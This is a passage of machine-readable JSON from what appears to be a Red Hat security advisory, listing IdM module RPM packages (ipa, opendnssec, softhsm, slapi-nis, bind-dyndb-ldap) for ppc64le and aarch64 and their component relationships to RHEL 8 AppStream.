"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_id": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_id": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_id": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product": {
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_id": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product": {
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_id": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product": {
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_id": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product": {
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_id": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"product": {
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"product_id": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"product": {
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"product_id": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debuginfo@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"product": {
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"product_id": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debugsource@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"product": {
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"product_id": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"product": {
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"product_id": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debuginfo@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"product": {
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"product_id": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debugsource@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"product": {
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"product_id": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"product": {
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"product_id": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debuginfo@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"product": {
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"product_id": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debugsource@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"product": {
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"product_id": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-devel@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product_id": "ipa-client-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product_id": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product_id": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product_id": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product_id": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product_id": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21692%2Bc9b201bc?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"product": {
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"product_id": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"product": {
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"product_id": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debuginfo@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"product": {
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"product_id": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/bind-dyndb-ldap-debugsource@11.6-5.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product": {
"name": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_id": "ipa-client-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product": {
"name": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_id": "ipa-client-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product": {
"name": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_id": "ipa-client-epn-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-epn@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product": {
"name": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_id": "ipa-client-samba-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-client-samba@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product": {
"name": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_id": "ipa-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product": {
"name": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_id": "ipa-debugsource-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-debugsource@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product": {
"name": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_id": "ipa-server-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product": {
"name": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_id": "ipa-server-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product": {
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_id": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product": {
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_id": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ipa-server-trust-ad-debuginfo@4.9.13-9.module%2Bel8.10.0%2B21691%2Bdf63127d?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"product": {
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"product_id": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"product": {
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"product_id": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debuginfo@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"product": {
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"product_id": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/opendnssec-debugsource@2.1.7-1.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"product": {
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"product_id": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"product": {
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"product_id": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debuginfo@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"product": {
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"product_id": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/slapi-nis-debugsource@0.60.0-4.module%2Bel8.10.0%2B20723%2B03062ebd?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"product": {
"name": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"product_id": "softhsm-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"product": {
"name": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"product_id": "softhsm-debuginfo-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debuginfo@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"product": {
"name": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"product_id": "softhsm-debugsource-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-debugsource@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"product": {
"name": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"product_id": "softhsm-devel-0:2.6.0-5.module+el8.9.0+18911+94941f82.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/softhsm-devel@2.6.0-5.module%2Bel8.9.0%2B18911%2B94941f82?arch=aarch64"
}
}
}
],
"category": "architecture",
"name": "aarch64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
"product_reference": "idm:DL1:8100020240416171943:823393f5",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64"
},
"product_reference": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le"
},
"product_reference": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x"
},
"product_reference": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src"
},
"product_reference": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64"
},
"product_reference": "bind-dyndb-ldap-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64"
},
"product_reference": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le"
},
"product_reference": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x"
},
"product_reference": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64"
},
"product_reference": "bind-dyndb-ldap-debuginfo-0:11.6-5.module+el8.10.0+21691+df63127d.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64"
},
"product_reference": "bind-dyndb-ldap-debugsource-0:11.6-5.module+el8.10.0+21691+df63127d.aarch64",
